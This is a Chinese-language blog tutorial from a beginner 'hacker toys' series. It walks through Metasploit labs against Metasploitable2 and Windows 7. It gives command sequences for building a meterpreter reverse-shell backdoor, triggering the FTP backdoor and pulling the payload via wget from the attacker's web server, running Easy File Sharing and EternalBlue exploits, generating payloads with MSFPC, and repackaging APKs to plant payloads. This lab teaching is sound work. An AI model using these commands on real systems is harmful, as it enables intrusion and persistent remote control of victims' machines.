前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >黑客玩具入门——5、继续Metasploit

黑客玩具入门——5、继续Metasploit

作者头像
zaking
发布2023-12-01 10:56:53
3460
发布2023-12-01 10:56:53
举报
文章被收录于专栏:zaking's

1、利用FTP漏洞并植入后门

实验靶机:Metasploitable2。

实践:

  1. 使用nmap扫描目标靶机
    1. nmap -sV xxx.xxx.xxx.xxx(目标ip)
  2. 生成linux系统后门
    1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx(主控端ip) LPORT=5555 -f elf -o /home/xxxx(用户名)/backdoor.elf
  3. 使用Apache服务在目标主机上下载后门
    1. sudo service apache2 start
    2. sudo cp home/xxxx(用户名)/backdoor.elf /var/www/html/
  4. 在主控端浏览器打开apache服务的ip地址,然后右键elf文件,选择Copy Link Location。
  5. 手工激活ftp后门。登录名:user:)。密码:pass
    1. 在主控端命令行输入:ftp xxx.xxx.xxx.xxx(靶机ip)。
    2. 输入登录名密码即可。
    3. 可以通过:nc xxx.xxx.xxx.xxx(靶机ip)。尝试判断是否启用成功。
  6. 然后在nc的命令行中执行下面的命令,这个地址就是你之前右键复制的那个地址。
    1. wget http://192.168.10.129/backdoor.elf
    2. 然后可以通过 cd / --> ls命令。看有没有这个文件。
  7. 然后,启用主控端。打开Metasploit,就跟之前一样。
    1. use exploit/multi/handler
    2. set payload linux/x86/meterpreter/reverse_tcp
    3. set lhost xxx.xxx.xxx.xxx(主控端ip)
    4. set lport 5555
    5. run
  8. 在目标主机上运行后门。以下命令在nc的命令行中操作:
    1. ./backdoor.elf。你会发现权限不足。
    2. chmod 7777 ./backdoor.elf。
    3. 然后再执行就可以了:./backdoor.elf。
  9. 然后,你就可以在meterpreter中为所欲为了。

2、常用攻击软件

由于Windows7使用了比较安全的机制,所以入侵win7远比入侵Windows xp要难得多。虽然系统本身很安全,但是我们不可能只安装一个系统,就什么都没有了,系统内我们还会安装很多软件,我们就可以从这些应用软件入手,去寻找他们的漏洞,借助这些软件做跳板,去入侵系统。

之前我们使用的是python脚本去攻击Easy File Sharing软件,使软件卡死。并成功在目标计算机上打开了计算器,这回我们使用Metasploit来攻击这个应用程序。

实验靶机:Windows7。

实践:

  1. search easyfilesharing。
  2. use exploit/windows/http/easyfilesharing_seh。
  3. set rhost xxx.xxx.xxx.xxx(目标ip)。
  4. set lport 6666。
  5. run。
  6. execute -f calc.exe。打开计算器。

3、攻击Windows7系统蓝屏

实验靶机:Windows7。

实践:

  1. search ms17-010。
  2. use exploit/windows/smb/ms17_010_eternalblue。
  3. set rhost xxx.xxx.xxx.xxx(目标ip)。
  4. set lport 6666。
  5. set payload windows/meterpreter/reverse_tcp。
  6. run。
  7. 然后Windows就蓝屏了。

4、漏洞利用工具集:MSFPC

生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编辑器。虽然它是一个非常强的payload生成神器,但是对于一个新手来说,可能难以在短时间内熟悉其操作。即使在进程最初的了解之后,生成一个基本的payload也需要输入相当多的内容。

MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的payload生成器,它简化了基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单的创建Payload。

使用方法:

  1. 漏洞利用工具集 --> msf payload creator --> 打开他。
  2. sudo msfpc windows xxx.xxx.xxx.xxx(当前主机ip) 6666。
  3. 然后会生成这么多东西:
  1. 其实就是把我们之前通过手动配置的东西都自动生成了。包括可执行文件、命令脚本等。我们看下如何来使用这些东西
    1. sudo service apache2 start。
    2. 跟之前一样,把刚才生成的可执行文件复制到Apache目录下。这里不写了。
    3. msfconsole -q -r [上面生成的那个.rc文件地址]
    4. 查看session
    5. 使用session。
    6. 成功!

5、Payload 介绍

病毒通常会做一些有害的或者恶意的动作。在病毒代码中实现这个功能的部分叫做“有效载荷(Payload)”。Payload可以实现任何运行在受害者环境中的程序所能做的事情。并且能够执行动作包括破坏文件、删除文件、向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。

Payloads模块,也叫有效载荷或有效负载,也就是我们常说的shellcode。在MSF中为我们提供了大量的Payloads。我们可以再MSF中通过show payloads命令查看。

payloads模块的命名规则

操作系统/类型/模块名称:windows/shell/bind_tcp。

  1. shell_find_taf:在一个已建立的链接上创建一个shell
  2. shell_reverse_tcp:反向链接到攻击者主机并创建一个shell
  3. bind_tcp:监听一个tcp链接。
  4. reverse_tcp:反向建立tcp链接。
  5. add_user:创建一个新用户并添加到管理组。

payloads模块等级

等级代表好用程度,一般分为以下几个等级:

  1. normal:正常
  2. excellent:优秀
  3. great:极好
  4. good:好
  5. average:一般、平均
  6. manual:手动

查看payloads下的某个模块的详细信息

  1. info [模块名]
    • info windows/shell/bind_tcp

6、apk文件的反编译

1)什么是逆向工程?反编译?

就是将已有的APP程序,反向操作,方便我们查看里面的原始文件,因为我们平时拿到的APP程序都是经过加密处理的。

2)反编译有什么用?

可以用来分析APP,比如获取IP地址。将payload植入其他APP等等。

3)APK反编译软件——apktool

  1. 反编译apk文件
  2. apktool d xxx.apk
  3. 将反编译后的文件重新打包
  4. apktool b xxx.apk
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-11-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1、利用FTP漏洞并植入后门
  • 2、常用攻击软件
  • 3、攻击Windows7系统蓝屏
  • 4、漏洞利用工具集:MSFPC
  • 5、Payload 介绍
  • 6、apk文件的反编译
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档